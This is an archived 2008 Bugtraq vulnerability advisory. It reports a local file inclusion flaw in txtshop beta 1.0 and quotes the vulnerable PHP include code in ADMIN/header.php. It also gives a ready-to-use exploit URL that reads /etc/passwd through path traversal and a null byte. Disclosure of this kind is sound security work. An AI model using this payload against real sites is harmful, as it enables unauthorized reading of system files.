lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 23 Oct 2008 11:32:12 +0200 From: Pepelux <pepelux@...e-sec.org> To: bugtraq@...urityfocus.com, bugtraq-owner@...urityfocus.com Subject: txtshop - beta 1.0 / Local File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- txtshop - beta 1.0 / Local File Inclusion Vulnerability -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $ Program: txtshop $ Version: <= 1.0 $ File affected: ADMIN/header.php $ Download: http://sourceforge.net/projects/txtshop/ Found by Pepelux <pepelux[at]enye-sec.org> eNYe-Sec - www.enye-sec.org --Bug -- 4. if (!$language)$language="ch"; 5. include_once("../lib/lang.".$language.".php"); -- Exploit -- http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00